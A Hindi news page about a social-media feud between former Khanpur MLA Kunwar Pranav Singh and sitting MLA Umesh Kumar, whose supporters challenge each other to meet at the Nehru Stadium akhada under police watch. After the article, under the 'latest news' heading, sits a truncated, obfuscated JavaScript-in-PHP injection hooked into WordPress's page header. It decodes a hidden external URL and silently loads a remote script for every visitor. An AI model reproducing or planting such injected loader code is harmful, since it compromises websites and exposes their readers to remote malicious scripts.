Saturday, July 27, 2024
spot_img

चैंपियन व उमेश कुमार की जुबानी जंग ने पकड़ा तूल, अखाड़े को जंग का मैदान बनाने को तैयार समर्थक।

खानपुर से पूर्व विधायक कुंवर प्रणव सिंह और मौजूदा विधायक उमेश कुमार के बीच सोशल मीडिया पर जुबानी जंग ने बड़ा तूल पकड़ लिया है। दोनों के समर्थक एक दूसरे को चेतावनी देते हुए आमने- सामने आ गए हैं।
आपको बता दें कि कुंवर प्रणव सिंह और उमेश कुमार के बीच जुबानी जंग तेज हो गई है। दोनों ही एक दूसरे पर कड़े प्रहार करते हुए सोशल मीडिया पर बयानबाजी कर रहे हैं। वही दोनों की जुबानी जंग में उनके समर्थक भी अब पीछे नहीं हट रहे हैं और एक दूसरे को खुली चुनौती देते हुए अखाड़े में उतरने तक की बात कर रहे हैं। जहां एक तरफ खानपुर विधायक उमेश कुमार के समर्थकों ने मीडिया के सामने पूर्व विधायक कुंवर प्रणव सिंह को नेहरू स्टेडियम अखाड़े में आने की चुनौती दी थी वही शनिवार को प्रणव सिंह के समर्थन में वीर गुर्जर सेना के राष्ट्रीय अध्यक्ष सोनू गुर्जर ने पत्रकार वार्ता कर प्रणव  सिंह के खिलाफ टिप्पणी ना करने की हिदायत दी थी और उन्होंने कहा था कि लंढोरा रियासत का अपमान बर्दाश्त नहीं किया जाएगा। साथ ही साथ प्रणव सिंह के कार्यालय पर भी प्रणव समर्थकों ने शनिवार शाम को विधायक उमेश कुमार समर्थकों को नेहरू स्टेडियम अखाड़े में  आने की खुली चुनोती दी थी जिसके बाद प्रणव सिंह के सैकड़ों समर्थक नेहरू स्टेडियम में भी पहुंचे थे लेकिन उमेश कुमार समर्थक नहीं पहुंचे। इस दौरान भारी पुलिस बल भी नेहरू स्टेडियम में मौजूद रहा था। वहीं इस चूहे बिल्ली के खेल में क्षेत्र की जनता अपने आप को ठगा सा महसूस कर रही है और मौजूदा विधायक व पूर्व विधायक की आपसी लड़ाई के चलते कहीं ना कहीं खानपुर विधानसभा के विकास कार्य भी बाधित होते नजर आ रहे हैं। अब देखने वाली बात यह होगी कि इस जुबानी जंग का क्या नतीजा सामने निकल कर आता है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>